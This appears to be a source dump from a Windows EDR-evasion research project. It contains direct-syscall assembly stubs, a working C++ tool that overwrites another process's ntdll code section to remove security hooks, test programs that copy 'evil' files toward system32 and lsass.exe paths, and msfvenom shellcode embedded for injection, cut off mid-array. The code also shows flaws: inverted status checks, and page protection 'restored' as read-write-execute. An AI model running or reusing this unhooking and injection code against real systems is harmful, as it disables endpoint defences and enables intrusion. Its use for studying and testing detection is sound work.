| mov eax, 16h 103 | syscall 104 | ret 105 | NtAllocateVirtualMemory80 endp 106 | 107 | NtFreeVirtualMemory80 proc 108 | mov r10, rcx 109 | mov eax, 1Ch 110 | syscall 111 | ret 112 | NtFreeVirtualMemory80 endp 113 | 114 | NtCreateFile80 proc 115 | mov r10, rcx 116 | mov eax, 53h 117 | syscall 118 | ret 119 | NtCreateFile80 endp 120 | 121 | ; Windows 8.1 / Server 2012 R2 specific syscalls 122 | 123 | ZwOpenProcess81 proc 124 | mov r10, rcx 125 | mov eax, 25h 126 | syscall 127 | ret 128 | ZwOpenProcess81 endp 129 | 130 | ZwClose81 proc 131 | mov r10, rcx 132 | mov eax, 0Eh 133 | syscall 134 | ret 135 | ZwClose81 endp 136 | 137 | ZwWriteVirtualMemory81 proc 138 | mov r10, rcx 139 | mov eax, 39h 140 | syscall 141 | ret 142 | ZwWriteVirtualMemory81 endp 143 | 144 | ZwProtectVirtualMemory81 proc 145 | mov r10, rcx 146 | mov eax, 4Fh 147 | syscall 148 | ret 149 | ZwProtectVirtualMemory81 endp 150 | 151 | ZwQuerySystemInformation81 proc 152 | mov r10, rcx 153 | mov eax, 35h 154 | syscall 155 | ret 156 | ZwQuerySystemInformation81 endp 157 | 158 | NtAllocateVirtualMemory81 proc 159 | mov r10, rcx 160 | mov eax, 17h 161 | syscall 162 | ret 163 | NtAllocateVirtualMemory81 endp 164 | 165 | NtFreeVirtualMemory81 proc 166 | mov r10, rcx 167 | mov eax, 1Dh 168 | syscall 169 | ret 170 | NtFreeVirtualMemory81 endp 171 | 172 | NtCreateFile81 proc 173 | mov r10, rcx 174 | mov eax, 54h 175 | syscall 176 | ret 177 | NtCreateFile81 endp 178 | 179 | ; Windows 10 / Server 2016 specific syscalls 180 | 181 | ZwOpenProcess10 proc 182 | mov r10, rcx 183 | mov eax, 26h 184 | syscall 185 | ret 186 | ZwOpenProcess10 endp 187 | 188 | ZwClose10 proc 189 | mov r10, rcx 190 | mov eax, 0Fh 191 | syscall 192 | ret 193 | ZwClose10 endp 194 | 195 | ZwWriteVirtualMemory10 proc 196 | mov r10, rcx 197 | mov eax, 3Ah 198 | syscall 199 | ret 200 | ZwWriteVirtualMemory10 endp 201 | 202 | ZwProtectVirtualMemory10 proc 203 | mov r10, rcx 204 | mov eax, 50h 205 | syscall 206 | ret 207 | ZwProtectVirtualMemory10 endp 208 | 209 | ZwQuerySystemInformation10 proc 210 | mov r10, rcx 211 | mov eax, 36h 212 | syscall 213 | ret 214 | ZwQuerySystemInformation10 endp 215 | 216 | NtAllocateVirtualMemory10 proc 217 | mov r10, rcx 218 | mov eax, 18h 219 | syscall 220 | ret 221 | NtAllocateVirtualMemory10 endp 222 | 223 | NtFreeVirtualMemory10 proc 224 | mov r10, rcx 225 | mov eax, 1Eh 226 | syscall 227 | ret 228 | NtFreeVirtualMemory10 endp 229 | 230 | NtCreateFile10 proc 231 | mov r10, rcx 232 | mov eax, 55h 233 | syscall 234 | ret 235 | NtCreateFile10 endp 236 | 237 | NtReadVirtualMemory PROC 238 | mov rax, gs:[60h] ; Load PEB into RAX. 239 | NtReadVirtualMemory_Check_X_X_XXXX: ; Check major version. 240 | cmp dword ptr [rax+118h], 10 241 | je NtReadVirtualMemory_Check_10_0_XXXX 242 | jmp NtReadVirtualMemory_SystemCall_Unknown 243 | NtReadVirtualMemory_Check_10_0_XXXX: ; Check build number for Windows 10. 244 | cmp word ptr [rax+120h], 10240 245 | je NtReadVirtualMemory_SystemCall_10_0_10240 246 | cmp word ptr [rax+120h], 10586 247 | je NtReadVirtualMemory_SystemCall_10_0_10586 248 | cmp word ptr [rax+120h], 14393 249 | je NtReadVirtualMemory_SystemCall_10_0_14393 250 | cmp word ptr [rax+120h], 15063 251 | je NtReadVirtualMemory_SystemCall_10_0_15063 252 | cmp word ptr [rax+120h], 16299 253 | je NtReadVirtualMemory_SystemCall_10_0_16299 254 | cmp word ptr [rax+120h], 17134 255 | je NtReadVirtualMemory_SystemCall_10_0_17134 256 | cmp word ptr [rax+120h], 17763 257 | je NtReadVirtualMemory_SystemCall_10_0_17763 258 | cmp word ptr [rax+120h], 18362 259 | je NtReadVirtualMemory_SystemCall_10_0_18362 260 | cmp word ptr [rax+120h], 18363 261 | je NtReadVirtualMemory_SystemCall_10_0_18363 262 | cmp word ptr [rax+120h], 19041 263 | je NtReadVirtualMemory_SystemCall_10_0_19041 264 | cmp word ptr [rax+120h], 19042 265 | je NtReadVirtualMemory_SystemCall_10_0_19042 266 | jmp NtReadVirtualMemory_SystemCall_Unknown 267 | NtReadVirtualMemory_SystemCall_10_0_10240: ; Windows 10.0.10240 (1507) 268 | mov eax, 003fh 269 | jmp NtReadVirtualMemory_Epilogue 270 | NtReadVirtualMemory_SystemCall_10_0_10586: ; Windows 10.0.10586 (1511) 271 | mov eax, 003fh 272 | jmp NtReadVirtualMemory_Epilogue 273 | NtReadVirtualMemory_SystemCall_10_0_14393: ; Windows 10.0.14393 (1607) 274 | mov eax, 003fh 275 | jmp NtReadVirtualMemory_Epilogue 276 | NtReadVirtualMemory_SystemCall_10_0_15063: ; Windows 10.0.15063 (1703) 277 | mov eax, 003fh 278 | jmp NtReadVirtualMemory_Epilogue 279 | NtReadVirtualMemory_SystemCall_10_0_16299: ; Windows 10.0.16299 (1709) 280 | mov eax, 003fh 281 | jmp NtReadVirtualMemory_Epilogue 282 | NtReadVirtualMemory_SystemCall_10_0_17134: ; Windows 10.0.17134 (1803) 283 | mov eax, 003fh 284 | jmp NtReadVirtualMemory_Epilogue 285 | NtReadVirtualMemory_SystemCall_10_0_17763: ; Windows 10.0.17763 (1809) 286 | mov eax, 003fh 287 | jmp NtReadVirtualMemory_Epilogue 288 | NtReadVirtualMemory_SystemCall_10_0_18362: ; Windows 10.0.18362 (1903) 289 | mov eax, 003fh 290 | jmp NtReadVirtualMemory_Epilogue 291 | NtReadVirtualMemory_SystemCall_10_0_18363: ; Windows 10.0.18363 (1909) 292 | mov eax, 003fh 293 | jmp NtReadVirtualMemory_Epilogue 294 | NtReadVirtualMemory_SystemCall_10_0_19041: ; Windows 10.0.19041 (2004) 295 | mov eax, 003fh 296 | jmp NtReadVirtualMemory_Epilogue 297 | NtReadVirtualMemory_SystemCall_10_0_19042: ; Windows 10.0.19042 (20H2) 298 | mov eax, 003fh 299 | jmp NtReadVirtualMemory_Epilogue 300 | NtReadVirtualMemory_SystemCall_Unknown: ; Unknown/unsupported version. 301 | ret 302 | NtReadVirtualMemory_Epilogue: 303 | mov r10, rcx 304 | syscall 305 | ret 306 | NtReadVirtualMemory ENDP 307 | 308 | end 309 | -------------------------------------------------------------------------------- /CustomCode/InterprocessSectionCopying/main.cpp: -------------------------------------------------------------------------------- 1 | #undef _UNICODE 2 | #define _UNICODE 3 | #undef UNICODE 4 | #define UNICODE 5 | 6 | #include 7 | #include 8 | #include "InterProcessSectionCopying.h" 9 | #include 10 | #include 11 | #include "sysc_sw2.h" 12 | #include 13 | 14 | #pragma comment (lib, "Dbghelp.lib") 15 | 16 | #define bytesToCompare 16 17 | 18 | int unhook(DWORD sourcePid, DWORD targetPid, LPCSTR dllName) 19 | { 20 | printf("Reading source and target...\n"); 21 | 22 | //Open process using syscalls 23 | HANDLE processHandleTarget = NULL; 24 | OBJECT_ATTRIBUTES ObjectAttributesTarget; 25 | InitializeObjectAttributes(&ObjectAttributesTarget, NULL, 0, NULL, NULL); 26 | CLIENT_ID uPidTarget = { 0 }; 27 | uPidTarget.UniqueProcess = (HANDLE)targetPid; 28 | uPidTarget.UniqueThread = (HANDLE)0; 29 | NTSTATUS statusOpenTarget = ZwOpenProcess10(&processHandleTarget, SYNCHRONIZE | STANDARD_RIGHTS_REQUIRED | 0xFFFF, &ObjectAttributesTarget, &uPidTarget); 30 | if (!statusOpenTarget == STATUS_SUCCESS) 31 | { 32 | printf("ERROR: Open target proc!"); 33 | return -1; 34 | } 35 | 36 | //Open process using syscalls 37 | HANDLE processHandleSource = NULL; 38 | OBJECT_ATTRIBUTES ObjectAttributesSource; 39 | InitializeObjectAttributes(&ObjectAttributesSource, NULL, 0, NULL, NULL); 40 | CLIENT_ID uPidSource = { 0 }; 41 | uPidSource.UniqueProcess = (HANDLE) sourcePid; 42 | uPidSource.UniqueThread = (HANDLE)0; 43 | NTSTATUS statusOpenSource = ZwOpenProcess10(&processHandleSource, SYNCHRONIZE | STANDARD_RIGHTS_REQUIRED | 0xFFFF, &ObjectAttributesSource, &uPidSource); 44 | if (!statusOpenSource == STATUS_SUCCESS) 45 | { 46 | printf("ERROR: Open source proc!"); 47 | return -2; 48 | } 49 | 50 | HMODULE dllToFix = GetModuleHandleA(dllName); 51 | MODULEINFO moduleInfo = {}; 52 | 53 | //Get DLL information based on loaded version for current process 54 | if (GetModuleInformation(GetCurrentProcess(), dllToFix, &moduleInfo, sizeof(moduleInfo)) == 0) { 55 | printf("GetModuleInformation error: %d\n", GetLastError()); 56 | printf("[%d]\n", __LINE__); 57 | return -3; 58 | } 59 | 60 | // Get base address of hooked Ntdll from MODULEINFO struct 61 | LPVOID hookedNtdllBaseAddress = NULL; 62 | hookedNtdllBaseAddress = (LPVOID)moduleInfo.lpBaseOfDll; 63 | if (hookedNtdllBaseAddress == 0) 64 | { 65 | printf("ERROR: Could not find base address! DLL exists?"); 66 | return -4; 67 | } 68 | 69 | printf("%-20s 0x%p\n", "Tainted dll base address: ", hookedNtdllBaseAddress); 70 | 71 | PIMAGE_DOS_HEADER dosHeader = 0; 72 | PIMAGE_NT_HEADERS ntHeader = 0; 73 | PIMAGE_SECTION_HEADER sectionHeader = 0; 74 | LPSTR sectionName; 75 | SIZE_T textSectionSize = NULL; 76 | LPVOID hookedNtdllTextStartAddress = NULL; 77 | 78 | // Get DOS header 79 | dosHeader = (PIMAGE_DOS_HEADER)hookedNtdllBaseAddress; 80 | 81 | // Get Nt Header 82 | ntHeader = (PIMAGE_NT_HEADERS)((DWORD_PTR)hookedNtdllBaseAddress + dosHeader->e_lfanew); 83 | 84 | Sleep(50); 85 | // Loop through all the PE sections until we find .text section (some adapted code based on Shellycoat) 86 | for (SIZE_T i = 0; i < ntHeader->FileHeader.NumberOfSections; i++) { 87 | // Get PE section header 88 | sectionHeader = (PIMAGE_SECTION_HEADER)((DWORD_PTR)IMAGE_FIRST_SECTION(ntHeader) + ((DWORD_PTR)IMAGE_SIZEOF_SECTION_HEADER * i)); 89 | 90 | // Get section name 91 | sectionName = (LPSTR)sectionHeader->Name; 92 | 93 | // We found .text section! 94 | if (!strcmp(sectionName, ".text")) { 95 | Sleep(50); 96 | printf("Found .text section\n"); 97 | 98 | textSectionSize = sectionHeader->Misc.VirtualSize; 99 | printf(".text section size: %d\n", textSectionSize); 100 | hookedNtdllTextStartAddress = (LPVOID)((DWORD_PTR)hookedNtdllBaseAddress + (DWORD_PTR)sectionHeader->VirtualAddress); 101 | break; 102 | } 103 | } 104 | if (textSectionSize == NULL) 105 | { 106 | printf("Error: .text section not found!"); 107 | return -5; 108 | } 109 | 110 | SIZE_T lpNumberOfBytesRead = 0; 111 | SIZE_T lpNumberOfBytesWritten = 0; 112 | PVOID buffer = (PVOID)malloc((ULONG)(textSectionSize + 4096)); //4096 is page size 113 | 114 | printf("Reading fresh content from source...\n"); 115 | NTSTATUS statusRead = NtReadVirtualMemory(processHandleSource, hookedNtdllTextStartAddress, buffer, textSectionSize, &lpNumberOfBytesRead); 116 | if (statusRead != STATUS_SUCCESS) { 117 | printf("NtReadVirtualMemory error: %X\n", statusRead); 118 | return -6; 119 | } 120 | //Remove page protection (store old details) 121 | printf("Removing page protection...\n"); 122 | ULONG oldProtection; 123 | NTSTATUS statusProtect = ZwProtectVirtualMemory10(processHandleTarget, &hookedNtdllTextStartAddress, &textSectionSize, PAGE_EXECUTE_READWRITE, &oldProtection); 124 | if (statusProtect != STATUS_SUCCESS) { 125 | printf("ZwProtectVirtualMemory10 error: %X\n", statusProtect); 126 | return -7; 127 | } 128 | 129 | //Write fresh DLL 130 | printf("Writing fresh content to target...\n"); 131 | NTSTATUS statusWrite = ZwWriteVirtualMemory10(processHandleTarget, hookedNtdllTextStartAddress, buffer, textSectionSize, &lpNumberOfBytesWritten); 132 | if (statusWrite != STATUS_SUCCESS) { 133 | printf("ZwWriteVirtualMemory10 error: %X\n", statusWrite); 134 | return -8; 135 | } 136 | 137 | //Restore right page protections 138 | printf("Restoring page protection...\n"); 139 | NTSTATUS statusRestore = ZwProtectVirtualMemory10(processHandleTarget, &hookedNtdllTextStartAddress, &textSectionSize, PAGE_EXECUTE_READWRITE, &oldProtection); 140 | if (statusRestore != STATUS_SUCCESS) { 141 | printf("ZwProtectVirtualMemory10 error: %X\n", statusRestore); 142 | return -9; 143 | } 144 | CloseHandle(processHandleSource); 145 | CloseHandle(processHandleTarget); 146 | printf("Done!\n"); 147 | return 0; 148 | } 149 | 150 | int wmain(int argc, wchar_t* argv[]) { 151 | 152 | if (argc != 4) 153 | { 154 | printf("Supply source pid, target pid and dllname as arguments. \n"); 155 | return -1; 156 | } 157 | 158 | DWORD sourcePid = _wtoi(argv[1]); 159 | DWORD targetPid = _wtoi(argv[2]); 160 | 161 | std::wstring wDll(argv[3]); //convert to wstring 162 | std::string sDll(wDll.begin(), wDll.end()); //and convert to string. 163 | LPCSTR dllName = (LPCSTR)sDll.c_str(); 164 | 165 | printf("\nUnhooking by Interprocess Section Copying (TM) \n\n"); 166 | 167 | printf(" ,w \n"); 168 | printf(" ,@* \n"); 169 | printf(" ,w, ,@\" \n"); 170 | printf(" \"~w gP \n"); 171 | printf(" ,@` ww, \n"); 172 | printf(" gP '~=\" \n"); 173 | printf(" /@@@@r \n"); 174 | printf(" $NM\",w~w, \n"); 175 | printf(" - @\" j- $ \n"); 176 | printf(" @K gP \"*~r\"`, ggN@MM & &&&MM & Nwg, \n"); 177 | printf(" a]@\" ,@` w*\"*w ,g@$|||@lllllllllllll||T$m, ,g@C \n"); 178 | printf(" ]P gP` N,,,A,@M||@llll@llllllllllllllllll|T&g, ,g@M$@C \n"); 179 | printf(" @ ,g@\" ,@$|ll$ Mll$|llll|lg@@@g||lllllllll||MNmgggMT|lly@ \n"); 180 | printf(" \"***\"` ]@ | lll | ll$ | llllll | TMNN@@@@@@lllllllllllllllllll@` \n"); 181 | printf(" \"Bglll]Wlllllllllllllllllllllllllll|@@m@@glll%W \n"); 182 | printf(" '*N@$lllllllllllllllllll||g@@NM*` *N@|%w \n"); 183 | printf(" \"*RN@@@@@@@@@NRP*\"\"\"` *@@w \n"); 184 | printf(" \"\" \n"); 185 | 186 | printf("Source pid: %d\n\n", sourcePid); 187 | printf("Target pid: %d\n\n", targetPid); 188 | 189 | return unhook(sourcePid, targetPid, dllName); 190 | } -------------------------------------------------------------------------------- /CustomCode/InterprocessSectionCopying/sysc_sw2.asm: -------------------------------------------------------------------------------- 1 | .code 2 | 3 | NtReadVirtualMemory PROC 4 | mov rax, gs:[60h] ; Load PEB into RAX. 5 | NtReadVirtualMemory_Check_X_X_XXXX: ; Check major version. 6 | cmp dword ptr [rax+118h], 10 7 | je NtReadVirtualMemory_Check_10_0_XXXX 8 | jmp NtReadVirtualMemory_SystemCall_Unknown 9 | NtReadVirtualMemory_Check_10_0_XXXX: ; Check build number for Windows 10. 10 | cmp word ptr [rax+120h], 10240 11 | je NtReadVirtualMemory_SystemCall_10_0_10240 12 | cmp word ptr [rax+120h], 10586 13 | je NtReadVirtualMemory_SystemCall_10_0_10586 14 | cmp word ptr [rax+120h], 14393 15 | je NtReadVirtualMemory_SystemCall_10_0_14393 16 | cmp word ptr [rax+120h], 15063 17 | je NtReadVirtualMemory_SystemCall_10_0_15063 18 | cmp word ptr [rax+120h], 16299 19 | je NtReadVirtualMemory_SystemCall_10_0_16299 20 | cmp word ptr [rax+120h], 17134 21 | je NtReadVirtualMemory_SystemCall_10_0_17134 22 | cmp word ptr [rax+120h], 17763 23 | je NtReadVirtualMemory_SystemCall_10_0_17763 24 | cmp word ptr [rax+120h], 18362 25 | je NtReadVirtualMemory_SystemCall_10_0_18362 26 | cmp word ptr [rax+120h], 18363 27 | je NtReadVirtualMemory_SystemCall_10_0_18363 28 | cmp word ptr [rax+120h], 19041 29 | je NtReadVirtualMemory_SystemCall_10_0_19041 30 | cmp word ptr [rax+120h], 19042 31 | je NtReadVirtualMemory_SystemCall_10_0_19042 32 | jmp NtReadVirtualMemory_SystemCall_Unknown 33 | NtReadVirtualMemory_SystemCall_10_0_10240: ; Windows 10.0.10240 (1507) 34 | mov eax, 003fh 35 | jmp NtReadVirtualMemory_Epilogue 36 | NtReadVirtualMemory_SystemCall_10_0_10586: ; Windows 10.0.10586 (1511) 37 | mov eax, 003fh 38 | jmp NtReadVirtualMemory_Epilogue 39 | NtReadVirtualMemory_SystemCall_10_0_14393: ; Windows 10.0.14393 (1607) 40 | mov eax, 003fh 41 | jmp NtReadVirtualMemory_Epilogue 42 | NtReadVirtualMemory_SystemCall_10_0_15063: ; Windows 10.0.15063 (1703) 43 | mov eax, 003fh 44 | jmp NtReadVirtualMemory_Epilogue 45 | NtReadVirtualMemory_SystemCall_10_0_16299: ; Windows 10.0.16299 (1709) 46 | mov eax, 003fh 47 | jmp NtReadVirtualMemory_Epilogue 48 | NtReadVirtualMemory_SystemCall_10_0_17134: ; Windows 10.0.17134 (1803) 49 | mov eax, 003fh 50 | jmp NtReadVirtualMemory_Epilogue 51 | NtReadVirtualMemory_SystemCall_10_0_17763: ; Windows 10.0.17763 (1809) 52 | mov eax, 003fh 53 | jmp NtReadVirtualMemory_Epilogue 54 | NtReadVirtualMemory_SystemCall_10_0_18362: ; Windows 10.0.18362 (1903) 55 | mov eax, 003fh 56 | jmp NtReadVirtualMemory_Epilogue 57 | NtReadVirtualMemory_SystemCall_10_0_18363: ; Windows 10.0.18363 (1909) 58 | mov eax, 003fh 59 | jmp NtReadVirtualMemory_Epilogue 60 | NtReadVirtualMemory_SystemCall_10_0_19041: ; Windows 10.0.19041 (2004) 61 | mov eax, 003fh 62 | jmp NtReadVirtualMemory_Epilogue 63 | NtReadVirtualMemory_SystemCall_10_0_19042: ; Windows 10.0.19042 (20H2) 64 | mov eax, 003fh 65 | jmp NtReadVirtualMemory_Epilogue 66 | NtReadVirtualMemory_SystemCall_Unknown: ; Unknown/unsupported version. 67 | ret 68 | NtReadVirtualMemory_Epilogue: 69 | mov r10, rcx 70 | syscall 71 | ret 72 | NtReadVirtualMemory ENDP 73 | 74 | end -------------------------------------------------------------------------------- /CustomCode/InterprocessSectionCopying/sysc_sw2.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | #include 4 | 5 | EXTERN_C NTSTATUS NtReadVirtualMemory( 6 | IN HANDLE ProcessHandle, 7 | IN PVOID BaseAddress OPTIONAL, 8 | OUT PVOID Buffer, 9 | IN SIZE_T BufferSize, 10 | OUT PSIZE_T NumberOfBytesRead OPTIONAL); 11 | 12 | -------------------------------------------------------------------------------- /CustomCode/PaLoCF/PaLoCF.cpp: -------------------------------------------------------------------------------- 1 | #undef _UNICODE 2 | #define _UNICODE 3 | #undef UNICODE 4 | #define UNICODE 5 | 6 | #include 7 | #include 8 | #include 9 | #include 10 | 11 | void step(int line) 12 | { 13 | printf("[%d]", line); 14 | Sleep(1000); 15 | } 16 | 17 | bool directoryExists(const std::string& directoryName) 18 | { 19 | DWORD ftyp = GetFileAttributesA(directoryName.c_str()); 20 | if (ftyp == INVALID_FILE_ATTRIBUTES) 21 | return false; 22 | 23 | if (ftyp & FILE_ATTRIBUTE_DIRECTORY) 24 | return true; 25 | 26 | return false; 27 | } 28 | 29 | void copyFile(LPCWSTR fileSource, LPCWSTR fileDest, int& ret,BOOL expectError,DWORD expectedErrorCode) 30 | { 31 | int res = CopyFileEx(fileSource, fileDest, NULL, NULL, NULL, COPY_FILE_NO_BUFFERING); 32 | if (res == 0) 33 | { 34 | if (expectError == FALSE) 35 | { 36 | std::wcout << "\nNo Error expected!\n"; 37 | ret = -1; 38 | } 39 | else 40 | if (GetLastError() != expectedErrorCode) 41 | { 42 | std::wcout << "\nCopying " << fileSource << " to " << fileDest << " failed with unexpected error " << GetLastError() << "\n"; 43 | ret = -1; 44 | } 45 | } 46 | else 47 | { 48 | if (expectError == TRUE) 49 | { 50 | std::wcout << "\nError expected, none occured!\n"; 51 | ret = -1; 52 | } 53 | } 54 | } 55 | 56 | int main(int argc, char* argv[]) 57 | { 58 | int ret = 0; 59 | printf("Compile time (for unique compilation): %s\n", __TIME__); 60 | printf("Waiting for some time to allow UH technique and detection of hooks...\n"); 61 | Sleep(9000); 62 | Sleep(9000); 63 | Sleep(9000); 64 | Sleep(9000); 65 | Sleep(9000); 66 | Sleep(9000); 67 | Sleep(9000); 68 | Sleep(9000); 69 | Sleep(9000); 70 | Sleep(9000); 71 | 72 | printf("Copying files.... "); 73 | step(__LINE__); 74 | 75 | if (!directoryExists("c:\\tempdir")) 76 | { 77 | if (_mkdir("c:\\tempdir") != 0) 78 | { 79 | printf("make dir failed"); 80 | ret = -1; 81 | } 82 | } 83 | step(__LINE__); 84 | copyFile(L"PaLoCF.exe", L"c:\\tempdir\\evil.exe", ret, FALSE, 0); 85 | step(__LINE__); 86 | copyFile(L"z:\\AV\\evil.txt", L"c:\\tempdir\\evil.exe",ret, FALSE, 0); 87 | step(__LINE__); 88 | copyFile(L"z:\\AV\\evil.txt", L"c:\\tempdir\\evil.exe", ret, FALSE, 0); //Twice, file exists 89 | step(__LINE__); 90 | copyFile(L"z:\\AV\\evil.txt", L"c:\\windows\\system32\\ntdll.dll", ret, TRUE, 5); 91 | step(__LINE__); 92 | copyFile(L"z:\\AV\\specialstring.txt", L"c:\\tempdir\\evil2.exe", ret, FALSE, 0); 93 | step(__LINE__); 94 | copyFile(L"z:\\AV\\specialstring.txt", L"c:\\windows\\system32\\ntdll2.dll", ret, TRUE, 5); 95 | step(__LINE__); 96 | copyFile(L"z:\\AV\\specialstring.txt", L"c:\\windows\\system32\\ntdll.dll", ret, TRUE, 5); 97 | step(__LINE__); 98 | copyFile(L"z:\\AV\\specialstring.txt", L"c:\\windows\\system32\\ntdll2.dll", ret, TRUE, 5); 99 | step(__LINE__); 100 | copyFile(L"z:\\AV\\specialstring.txt", L"c:\\windows\\system32\\lsass.exe", ret, TRUE, 5); 101 | step(__LINE__); 102 | copyFile(L"z:\\AV\\evil.txt", L"c:\\windows\\system32\\lsass.exe", ret, TRUE, 5); 103 | step(__LINE__); 104 | copyFile(L"\\\\VBoxSvr\\Shared\\AV\\specialstring.txt", L"c:\\tempdir\\test1.dll", ret, FALSE, 0); 105 | step(__LINE__); 106 | copyFile(L"\\\\VBoxSvr\\Shared\\AV\\specialstring.txt", L"c:\\tempdir\\test2.exe", ret, FALSE, 0); 107 | step(__LINE__); 108 | copyFile(L"\\\\VBoxSvr\\Shared\\AV\\specialstring.txt", L"c:\\tempdir\\test3.com", ret, FALSE, 0); 109 | step(__LINE__); 110 | copyFile(L"\\\\VBoxSvr\\Shared\\AV\\specialstring.txt", L"c:\\windows\\system32\\lsasss.exe", ret, TRUE, 5); 111 | step(__LINE__); 112 | copyFile(L"\\\\VBoxSvr\\Shared\\newsflash.dll", L"c:\\tempdir\\test.dll", ret, FALSE, 0); 113 | step(__LINE__); 114 | copyFile(L"\\\\VBoxSvr\\Shared\\newsflash.dll", L"c:\\tempdir\\lsass2.exe", ret, FALSE, 0); 115 | step(__LINE__); 116 | copyFile(L"\\\\VBoxSvr\\Shared\\newsflash.dll", L"c:\\windows\\system32\\lsass2.exe", ret, TRUE, 5); 117 | step(__LINE__); 118 | copyFile(L"\\\\VBoxSvr\\Shared\\newsflash.dll", L"c:\\windows\\system32\\lsass.exe", ret, TRUE, 5); 119 | step(__LINE__); 120 | copyFile(L"\\\\VBoxSvr\\Shared\\newsflash.dll", L"c:\\windows\\system32\\lsass.exe", ret, TRUE, 5); 121 | if (ret != 0) 122 | { 123 | printf("ERROR: return code not 0"); 124 | return -1; 125 | } 126 | Sleep(9000); 127 | step(__LINE__); 128 | printf("Done.\n"); 129 | return 0; 130 | } 131 | 132 | -------------------------------------------------------------------------------- /CustomCode/PaLoCF/PaLoCF.vcxproj: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | Debug 6 | Win32 7 | 8 | 9 | Release 10 | Win32 11 | 12 | 13 | Debug 14 | x64 15 | 16 | 17 | Release 18 | x64 19 | 20 | 21 | 22 | 16.0 23 | Win32Proj 24 | {594ad1a0-2692-4c42-bc7b-b1799e500cc6} 25 | PaLoCF 26 | 10.0 27 | 28 | 29 | 30 | Application 31 | true 32 | v142 33 | Unicode 34 | 35 | 36 | Application 37 | false 38 | v142 39 | true 40 | Unicode 41 | 42 | 43 | Application 44 | true 45 | v142 46 | Unicode 47 | 48 | 49 | Application 50 | false 51 | v142 52 | true 53 | Unicode 54 | 55 | 56 | 57 | 58 | 59 | 60 | 61 | 62 | 63 | 64 | 65 | 66 | 67 | 68 | 69 | 70 | 71 | 72 | 73 | 74 | true 75 | 76 | 77 | false 78 | 79 | 80 | true 81 | 82 | 83 | false 84 | 85 | 86 | 87 | Level3 88 | true 89 | WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions) 90 | true 91 | 92 | 93 | Console 94 | true 95 | 96 | 97 | 98 | 99 | Level3 100 | true 101 | true 102 | true 103 | WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions) 104 | true 105 | 106 | 107 | Console 108 | true 109 | true 110 | true 111 | 112 | 113 | 114 | 115 | Level3 116 | true 117 | _DEBUG;_CONSOLE;%(PreprocessorDefinitions) 118 | true 119 | 120 | 121 | Console 122 | true 123 | 124 | 125 | 126 | 127 | Level3 128 | true 129 | true 130 | true 131 | NDEBUG;_CONSOLE;%(PreprocessorDefinitions) 132 | true 133 | MultiThreaded 134 | 135 | 136 | Console 137 | true 138 | true 139 | true 140 | 141 | 142 | 143 | 144 | 145 | 146 | 147 | 148 | -------------------------------------------------------------------------------- /CustomCode/PaLoCF/PaLoCF.vcxproj.filters: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd 11 | 12 | 13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} 14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms 15 | 16 | 17 | 18 | 19 | Source Files 20 | 21 | 22 | -------------------------------------------------------------------------------- /CustomCode/PaLoInj/PaLoInj.cpp: -------------------------------------------------------------------------------- 1 | #undef _UNICODE 2 | #define _UNICODE 3 | #undef UNICODE 4 | #define UNICODE 5 | 6 | #include 7 | #include 8 | 9 | int main(int argc, char* argv[]) 10 | { 11 | printf("Compile time (for unique compilation): %s\n", __TIME__); 12 | printf("Waiting for some time to allow UH technique and detection of hooks...\n"); 13 | Sleep(9000); 14 | Sleep(9000); 15 | Sleep(9000); 16 | Sleep(9000); 17 | Sleep(9000); 18 | Sleep(9000); 19 | Sleep(9000); 20 | Sleep(9000); 21 | Sleep(9000); 22 | Sleep(9000); 23 | 24 | unsigned char buf5[] = 25 | 26 | //Messagebox OS3 generated using msfvenom: 27 | "\xfc\x48\x81\xe4\xf0\xff\xff\xff\xe8\xd0\x00\x00\x00\x41\x51" 28 | "\x41\x50\x52\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x3e\x48" 29 | "\x8b\x52\x18\x3e\x48\x8b\x52\x20\x3e\x48\x8b\x72\x50\x3e\x48" 30 | "\x0f\xb7\x4a\x4a\x4d\x31\xc9\x48\x31\xc0\xac\x3c\x61\x7c\x02" 31 | "\x2c\x20\x41\xc1\xc9\x0d\x41\x01\xc1\xe2\xed\x52\x41\x51\x3e" 32 | "\x48\x8b\x52\x20\x3e\x8b\x42\x3c\x48\x01\xd0\x3e\x8b\x80\x88" 33 | "\x00\x00\x00\x48\x85\xc0\x74\x6f\x48\x01\xd0\x50\x3e\x8b\x48" 34 | "\x18\x3e\x44\x8b\x40\x20\x49\x01\xd0\xe3\x5c\x48\xff\xc9\x3e" 35 | "\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0\xac\x41" 36 | "\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x3e\x4c\x03\x4c\x24" 37 | "\x08\x45\x39\xd1\x75\xd6\x58\x3e\x44\x8b\x40\x24\x49\x01\xd0" 38 | "\x66\x3e\x41\x8b\x0c\x48\x3e\x44\x8b\x40\x1c\x49\x01\xd0\x3e" 39 | "\x41\x8b\x04\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41" 40 | "\x58\x41\x59\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41" 41 | "\x59\x5a\x3e\x48\x8b\x12\xe9\x49\xff\xff\xff\x5d\x49\xc7\xc1" 42 | "\x00\x00\x00\x00\x3e\x48\x8d\x95\xfe\x00\x00\x00\x3e\x4c\x8d" 43 | "\x85\x27\x01\x00\x00\x48\x31\xc9\x41\xba\x45\x83\x56\x07\xff" 44 | "\xd5\x48\x31\xc9\x41\xba\xf0\xb5\xa2\x56\xff\xd5\x54\x68\x69" 45 | "\x73\x20\x69\x6e\x6a\x65\x63\x74\x65\x64\x20\x6d\x65\x73\x73" 46 | "\x61\x67\x65\x62\x6f\x78\x20\x69\x73\x20\x6e\x6f\x74\x20\x62" 47 | 